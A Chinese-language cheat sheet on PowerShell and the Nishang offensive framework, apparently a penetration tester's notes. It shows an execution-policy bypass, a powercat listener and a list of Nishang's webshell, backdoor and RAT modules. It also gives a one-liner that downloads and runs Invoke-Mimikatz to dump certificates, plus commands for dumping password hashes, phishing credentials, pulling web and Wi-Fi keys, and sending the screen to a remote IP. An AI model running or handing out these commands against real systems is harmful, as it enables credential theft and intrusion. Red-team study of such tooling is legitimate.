PowerShell nishang

PowerShell 基本操作

自动加载模块

内置变量

$PSModuleAutoLoadingPreference

内置变量

Get-Variable

执行权限设置

Set-ExecutionPolicy RemoteSigned

绕过权限控制

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

查看当前模块

Get-Module

导入模块

Import-Module .\powercat.ps1

执行内容

powercat -l -v -p 4444

查看主机

Get-Host

查看帮助

Get-Help 命令 -full

简介

目录	作用
Antak-WebShell	webshell
Backdoors	后门
Client	客户端
Escalation	提权
Execution	RCE
Gather	信息收集
Misc	发音
Pivot	跳板/远程执行EXE
Prasadhak	virustotal
Scan	扫描
Shells	RAT
Utility	杂项
powerpreter	内存RAT/meterpreter会话

payload example

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mat
tifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts

Gather

Invoke-MimikatzWDigestDowngrade(未成功)

PS >Invoke-MimikatzWDigestDowngrade
PS >Get-Job | Receive-Job

相关链接
http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
https://www.trustedsec.com/april-2015/dumping-wdigest-creds-with-meterpreter-mimikatzkiwi-in-windows-8-1/
https://github.com/samratashok/nishang

Get-Information(普通伤害)

主要为网络相关信息
PS >Get-Information

Invoke-CredentialsPhish(效果拔群)

PS >Invoke-CredentialsPhish

Get-WebCredentials(效果拔群)

PS >Get-WebCredentials.ps1

Get-PassHints

PS >Get-PassHints

Get-PassHashes

PS >Get-PassHashes

Get-WLAN-Keys

PS >Get-WLAN-Keys

Show-TargetSreen.ps1

PS >Show-TargetScreen -Reverse -IPAddress 192.168.230.1 -Port 443

Check-VM

PS >Check-VM

误判

PS I:\PowerShellToolkit\nishang-master\Gather> Check-VM
This is a Hyper-V machine.

特殊环境通信

Firebuster is to be run on the target machine which is to be tested for egress filtering.

FireBuster

FireListener

参考资料

[1] https://github.com/samratashok/nishang
[2] FireEye <>
[3] powershell各种反弹姿势以及取证（二） http://www.secpulse.com/archives/32350.html
[4] 使用powershell Client进行有效钓鱼
[5] 利用Powershell快速导出域控所有用户Hash
[6] Powershell tricks::Code Execution & Process Injection
[7] POWERSHELL内网渗透实例
[8] 利用Web查询文件(.iqy)有效钓鱼
[9] PowerShell 技能连载 - 加载 PowerShell 模块
[10] nishang